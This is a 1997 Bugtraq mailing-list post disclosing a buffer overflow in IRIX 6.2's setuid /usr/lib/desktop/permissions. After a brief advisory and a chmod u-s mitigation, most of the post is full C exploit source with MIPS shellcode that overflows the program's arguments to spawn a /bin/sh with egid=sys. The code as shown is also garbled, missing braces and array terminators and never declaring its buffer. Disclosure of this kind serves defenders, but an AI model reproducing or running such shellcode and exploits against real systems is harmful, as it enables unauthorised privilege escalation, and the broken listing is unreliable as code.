Bugtraq mailing list archives

another irix buffer overflow...

From: hedley () CS BRIS AC UK (David Hedley)
Date: Mon, 26 May 1997 23:06:10 +0100

While we're on the subject, here's another buffer overflow for Irix 6.2
This time it's /usr/lib/desktop/permissions. Although it's suid root,
this exploit will only give you egid=sys. There may well be exploits
which get root from it so you'd be as well to
chmod u-s /usr/lib/desktop/permissions to be on the safe side.

As this exploit hits $gp, it won't work on Irix 5.3

Irix 6.3 isn't vulnerable as SGI appears not to ship it with the program
in question (although there is still a manual page for it).

You'll need to give the target machine access to your display for this
exploit to work.


 David Hedley (hedley () cs bris ac uk)
 finger hedley () cs bris ac uk for PGP key
 Computer Graphics Group | University of Bristol | UK

------------------------- cut here --------------------------------------

/* /usr/lib/desktop/permissions exploit by DCRH 26/5/97
 * This gives you egid = sys
 * Tested on: R8000 Power Challenge (Irix64 6.2)
 * Exploit doesn't work on Irix 5.x due to stack position
 * compile as: cc -n32 perm.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

#define NUM_ADDRESSES   400
#define BUF_LENGTH      700
#define EXTRA           500
#define OFFSET          0x200
#define GP_OFFSET       31612
#define IRIX_NOP        0x03e0f825    /* move $ra,$ra */

#define u_long unsigned

u_long get_sp_code[] = {
    0x03a01025,         /* move $v0,$sp         */
    0x03e00008,         /* jr $ra               */
    0x00000000,         /* nop                  */

u_long irix_shellcode[] = {
    0x24041234,         /* li $4,0x1234         */
    0x2084edcc,         /* sub $4,0x1234        */
    0x0491fffe,         /* bgezal $4,pc-4       */
    0x03bd302a,         /* sgt $6,$sp,$sp       */
    0x23e4012c,         /* addi $4,$31,264+36   */
    0xa086feff,         /* sb $6,-264+7($4)     */
    0x2084fef8,         /* sub $4,264           */
    0x20850110,         /* addi $5,$4,264+8     */
    0xaca4fef8,         /* sw $4,-264($5)       */
    0xaca6fefc,         /* sw $4,-260($5)       */
    0x20a5fef8,         /* sub $5, 264          */
    0x240203f3,         /* li $v0,1011          */
    0x03ffffcc,         /* syscall 0xfffff      */
    0x2f62696e,         /* "/bin"               */
    0x2f7368ff,         /* "/sh"                */


void main(int argc, char **argv)
    char *env[] = {NULL};
    u_long targ_addr, stack, tmp;
    u_long *long_p;
    int i, code_length = strlen((char *)irix_shellcode)+1;
    u_long (*get_sp)(void) = (u_long (*)(void))get_sp_code;

    stack = get_sp();

    if (stack & 0x80000000) {
        printf("Recompile with the '-n32' option\n");

    long_p =(u_long *)  buf;
    targ_addr = stack + OFFSET;

    if (argc > 1)
        targ_addr += atoi(argv[1]) * 4;

    if (targ_addr + GP_OFFSET > 0x80000000) {
        printf("Sorry - this exploit for Irix 6.x only\n");

    tmp = (targ_addr + NUM_ADDRESSES + (BUF_LENGTH-code_length)/2) & ~3;

    while ((tmp & 0xff000000) == 0 ||
           (tmp & 0x00ff0000) == 0 ||
           (tmp & 0x0000ff00) == 0 ||
           (tmp & 0x000000ff) == 0)
        tmp += 4;

    for (i = 0; i < NUM_ADDRESSES/sizeof(u_long); i++)
        *long_p++ = tmp;

    for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
        *long_p++ = IRIX_NOP;

    for (i = 0; i < code_length/sizeof(u_long); i++)
        *long_p++ = irix_shellcode[i];

    tmp = (targ_addr + GP_OFFSET + NUM_ADDRESSES/2) & ~3;

    for (i = 0; i < EXTRA / sizeof(u_long); i++)
        *long_p++ = (tmp << 16) | (tmp >> 16);

    *long_p = 0;

    printf("stack = 0x%x, targ_addr = 0x%x\n", stack, targ_addr);

    execle("/usr/lib/desktop/permissions", "permissions",
           "-display", getenv("DISPLAY"), "/bin/ls", buf, 0, env);
    perror("execl failed");

Current thread: